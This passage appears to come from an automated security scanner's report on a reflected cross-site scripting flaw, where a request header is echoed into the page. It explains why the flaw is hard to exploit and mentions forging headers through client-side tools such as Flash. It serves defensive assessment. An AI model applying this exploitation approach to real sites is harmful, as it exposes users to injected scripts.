This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.